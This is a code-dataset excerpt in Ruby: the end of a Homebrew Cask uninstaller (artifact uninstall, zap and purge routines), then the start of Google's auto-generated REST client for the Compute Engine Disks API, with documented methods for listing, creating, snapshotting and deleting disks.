odebug "#{artifacts.length} #{"artifact".pluralize(artifacts.length)} defined", artifacts
artifacts.each do |artifact|
if artifact.respond_to?(:uninstall_phase)
odebug "Uninstalling artifact of class #{artifact.class}"
artifact.uninstall_phase(
command: @command, verbose: verbose?, skip: clear, force: force?, upgrade: upgrade?,
)
end
next unless artifact.respond_to?(:post_uninstall_phase)
odebug "Post-uninstalling artifact of class #{artifact.class}"
artifact.post_uninstall_phase(
command: @command, verbose: verbose?, skip: clear, force: force?, upgrade: upgrade?,
)
end
end
def zap
ohai "Implied `brew uninstall --cask #{@cask}`"
uninstall_artifacts
if (zap_stanzas = @cask.artifacts.select { |a| a.is_a?(Artifact::Zap) }).empty?
opoo "No zap stanza present for Cask '#{@cask}'"
else
ohai "Dispatching zap stanza"
zap_stanzas.each do |stanza|
stanza.zap_phase(command: @command, verbose: verbose?, force: force?)
end
end
ohai "Removing all staged versions of Cask '#{@cask}'"
purge_caskroom_path
end
def backup_path
return if @cask.staged_path.nil?
Pathname("#{@cask.staged_path}.upgrading")
end
def backup_metadata_path
return if @cask.metadata_versioned_path.nil?
Pathname("#{@cask.metadata_versioned_path}.upgrading")
end
def gain_permissions_remove(path)
Utils.gain_permissions_remove(path, command: @command)
end
def purge_backed_up_versioned_files
# versioned staged distribution
gain_permissions_remove(backup_path) if backup_path&.exist?
# Homebrew Cask metadata
return unless backup_metadata_path.directory?
backup_metadata_path.children.each do |subdir|
gain_permissions_remove(subdir)
end
backup_metadata_path.rmdir_if_possible
end
def purge_versioned_files
ohai "Purging files for version #{@cask.version} of Cask #{@cask}"
# versioned staged distribution
gain_permissions_remove(@cask.staged_path) if @cask.staged_path&.exist?
# Homebrew Cask metadata
if @cask.metadata_versioned_path.directory?
@cask.metadata_versioned_path.children.each do |subdir|
gain_permissions_remove(subdir)
end
@cask.metadata_versioned_path.rmdir_if_possible
end
@cask.metadata_main_container_path.rmdir_if_possible unless upgrade?
# toplevel staged distribution
@cask.caskroom_path.rmdir_if_possible unless upgrade?
end
def purge_caskroom_path
odebug "Purging all staged versions of Cask #{@cask}"
gain_permissions_remove(@cask.caskroom_path)
end
end
end
| 31.16 | 120 | 0.664838 |
1a693a6793eca76bc85f16470b6930529ac37c1d | 71,334 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/errors"
require "google/cloud/compute/v1/compute_pb"
module Google
module Cloud
module Compute
module V1
module Disks
module Rest
##
# REST client for the Disks service.
#
# The Disks API.
#
class Client
include GrpcTranscoding
# @private
attr_reader :disks_stub
##
# Configure the Disks Client class.
#
# See {::Google::Cloud::Compute::V1::Disks::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# ## Example
#
# To modify the configuration for all Disks clients:
#
# ::Google::Cloud::Compute::V1::Disks::Rest::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
namespace = ["Google", "Cloud", "Compute", "V1"]
parent_config = while namespace.any?
parent_name = namespace.join "::"
parent_const = const_get parent_name
break parent_const.configure if parent_const.respond_to? :configure
namespace.pop
end
default_config = Client::Configuration.new parent_config
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the Disks Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Cloud::Compute::V1::Disks::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new Disks REST client object.
#
# ## Examples
#
# To create a new Disks REST client with the default
# configuration:
#
# client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#
# To create a new Disks REST client with a custom
# configuration:
#
# client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Disks client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the REST modules only when it's required.
require "gapic/rest"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
credentials ||= Credentials.default scope: @config.scope
if credentials.is_a?(String) || credentials.is_a?(Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@client_stub = ::Gapic::Rest::ClientStub.new endpoint: @config.endpoint, credentials: credentials
end
# Service calls
##
# Adds existing resource policies to a disk. You can only add one policy, which will be applied to this disk for scheduling snapshot creation.
#
# @overload add_resource_policies(request, options = nil)
# Pass arguments to `add_resource_policies` via a request object, either of type
# {::Google::Cloud::Compute::V1::AddResourcePoliciesDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::AddResourcePoliciesDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, such as timeout and retries. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload add_resource_policies(disk: nil, disks_add_resource_policies_request_resource: nil, project: nil, request_id: nil, zone: nil)
# Pass arguments to `add_resource_policies` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# The disk name for this request.
# @param disks_add_resource_policies_request_resource [::Google::Cloud::Compute::V1::DisksAddResourcePoliciesRequest, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check whether the original operation with the same request ID was received and, if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
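# A hypothetical usage sketch (names are placeholders; the request fields are
# taken from the parameter docs above, and the policy URL format is assumed):
#
# @example Add a snapshot-schedule resource policy to a disk
#   client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#   result = client.add_resource_policies(
#     project: "my-project",
#     zone: "us-central1-a",
#     disk: "my-disk",
#     disks_add_resource_policies_request_resource: {
#       resource_policies: ["regions/us-central1/resourcePolicies/daily-snapshots"]
#     }
#   )
#   puts result.status # result is a ::Google::Cloud::Compute::V1::Operation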
def add_resource_policies request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::AddResourcePoliciesDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_add_resource_policies request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Retrieves an aggregated list of persistent disks.
#
# @overload aggregated_list(request, options = nil)
# Pass arguments to `aggregated_list` via a request object, either of type
# {::Google::Cloud::Compute::V1::AggregatedListDisksRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::AggregatedListDisksRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, such as timeout and retries. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload aggregated_list(filter: nil, include_all_scopes: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, return_partial_success: nil)
# Pass arguments to `aggregated_list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param include_all_scopes [::Boolean]
# Indicates whether every visible scope for each scope type (zone, region, global) should be included in the response. For new resource types added after this field, the flag has no effect as new resource types will always include every visible scope for each scope type in response. For resource types which predate this field, if this flag is omitted or false, only scopes of the scope types where the resource type is expected to be found will be included.
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Project ID for this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior, which provides partial results in case of failure. The default value is false, which preserves the existing behavior.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::DiskAggregatedList]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::DiskAggregatedList]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
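# A hypothetical usage sketch (placeholder project; the filter string follows
# the grammar described above, and the scoped-list shape is assumed):
#
# @example List disks across all zones, excluding one by name
#   client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#   agg = client.aggregated_list(project: "my-project", filter: "name != example-disk")
#   agg.items.each do |scope, scoped_list|
#     # scope is e.g. "zones/us-central1-a"; scoped_list.disks may be empty
#   end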
def aggregated_list request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::AggregatedListDisksRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_aggregated_list request
response = @client_stub.make_get_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::DiskAggregatedList.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Creates a snapshot of a specified persistent disk.
#
# @overload create_snapshot(request, options = nil)
# Pass arguments to `create_snapshot` via a request object, either of type
# {::Google::Cloud::Compute::V1::CreateSnapshotDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::CreateSnapshotDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, such as timeout and retries. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload create_snapshot(disk: nil, guest_flush: nil, project: nil, request_id: nil, snapshot_resource: nil, zone: nil)
# Pass arguments to `create_snapshot` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# Name of the persistent disk to snapshot.
# @param guest_flush [::Boolean]
# [Input Only] Whether to attempt an application consistent snapshot by informing the OS to prepare for the snapshot process. Currently only supported on Windows instances using the Volume Shadow Copy Service (VSS).
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check whether the original operation with the same request ID was received and, if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param snapshot_resource [::Google::Cloud::Compute::V1::Snapshot, ::Hash]
# The body resource for this request
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
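# A hypothetical usage sketch (placeholder names; only the snapshot `name`
# field is set, and the other Snapshot fields are omitted):
#
# @example Snapshot a persistent disk
#   client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#   operation = client.create_snapshot(
#     project: "my-project",
#     zone: "us-central1-a",
#     disk: "my-disk",
#     snapshot_resource: { name: "my-disk-snapshot" }
#   )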
def create_snapshot request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::CreateSnapshotDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_create_snapshot request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Deletes the specified persistent disk. Deleting a disk removes its data permanently and is irreversible. However, deleting a disk does not delete any snapshots previously made from the disk. You must separately delete snapshots.
#
# @overload delete(request, options = nil)
# Pass arguments to `delete` via a request object, either of type
# {::Google::Cloud::Compute::V1::DeleteDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::DeleteDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, such as timeout and retries. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload delete(disk: nil, project: nil, request_id: nil, zone: nil)
# Pass arguments to `delete` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# Name of the persistent disk to delete.
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check whether the original operation with the same request ID was received and, if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
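# A hypothetical usage sketch (placeholder names; a request_id makes a retried
# delete idempotent, per the parameter docs above):
#
# @example Delete a disk with a retry-safe request ID
#   require "securerandom"
#
#   client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#   operation = client.delete(
#     project: "my-project",
#     zone: "us-central1-a",
#     disk: "obsolete-disk",
#     request_id: SecureRandom.uuid
#   )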
def delete request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::DeleteDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_delete request
response = @client_stub.make_delete_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Returns a specified persistent disk. Gets a list of available persistent disks by making a list() request.
#
# @overload get(request, options = nil)
# Pass arguments to `get` via a request object, either of type
# {::Google::Cloud::Compute::V1::GetDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::GetDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, such as timeout and retries. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload get(disk: nil, project: nil, zone: nil)
# Pass arguments to `get` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk [::String]
# Name of the persistent disk to return.
# @param project [::String]
# Project ID for this request.
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Disk]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Disk]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
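# A hypothetical usage sketch (placeholder names; `size_gb` is a standard
# field on the returned Disk message):
#
# @example Fetch a single disk
#   client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#   disk = client.get(project: "my-project", zone: "us-central1-a", disk: "my-disk")
#   puts "#{disk.name}: #{disk.size_gb} GB"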
def get request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::GetDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, _query_string_params = transcode_get request
response = @client_stub.make_get_request(
uri: uri,
options: options
)
result = ::Google::Cloud::Compute::V1::Disk.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Gets the access control policy for a resource. May be empty if no such policy or resource exists.
#
# @overload get_iam_policy(request, options = nil)
# Pass arguments to `get_iam_policy` via a request object, either of type
# {::Google::Cloud::Compute::V1::GetIamPolicyDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::GetIamPolicyDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, such as timeout and retries. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload get_iam_policy(options_requested_policy_version: nil, project: nil, resource: nil, zone: nil)
# Pass arguments to `get_iam_policy` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param options_requested_policy_version [::Integer]
# Requested IAM Policy version.
# @param project [::String]
# Project ID for this request.
# @param resource [::String]
# Name or id of the resource for this request.
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Policy]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Policy]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
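# A hypothetical usage sketch (placeholder names; `resource` is the disk name
# or id, per the parameter docs above):
#
# @example Read the IAM policy of a disk
#   client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#   policy = client.get_iam_policy(
#     project: "my-project",
#     zone: "us-central1-a",
#     resource: "my-disk"
#   )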
def get_iam_policy request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::GetIamPolicyDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_get_iam_policy request
response = @client_stub.make_get_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::Policy.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Creates a persistent disk in the specified project using the data in the request. You can create a disk from a source (sourceImage, sourceSnapshot, or sourceDisk) or create an empty 500 GB data disk by omitting all properties. You can also create a disk that is larger than the default size by specifying the sizeGb property.
#
# @overload insert(request, options = nil)
# Pass arguments to `insert` via a request object, either of type
# {::Google::Cloud::Compute::V1::InsertDiskRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::InsertDiskRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, such as timeout and retries. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload insert(disk_resource: nil, project: nil, request_id: nil, source_image: nil, zone: nil)
# Pass arguments to `insert` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param disk_resource [::Google::Cloud::Compute::V1::Disk, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check whether the original operation with the same request ID was received and, if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param source_image [::String]
# Optional. Source image to restore onto a disk.
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
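# A hypothetical usage sketch (placeholder names; sets an explicit size
# instead of the 500 GB default described above):
#
# @example Create a blank 100 GB disk
#   client = ::Google::Cloud::Compute::V1::Disks::Rest::Client.new
#   operation = client.insert(
#     project: "my-project",
#     zone: "us-central1-a",
#     disk_resource: { name: "new-disk", size_gb: 100 }
#   )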
def insert request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::InsertDiskRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_insert request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Retrieves a list of persistent disks contained within the specified zone.
#
# @overload list(request, options = nil)
# Pass arguments to `list` via a request object, either of type
# {::Google::Cloud::Compute::V1::ListDisksRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::ListDisksRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, such as timeout and retries. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload list(filter: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, return_partial_success: nil, zone: nil)
# Pass arguments to `list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Project ID for this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior, which provides partial results in case of failure. The default value is false, which preserves the existing behavior.
# @param zone [::String]
# The name of the zone for this request.
# @yield [result, response] Access the result along with the Faraday response object
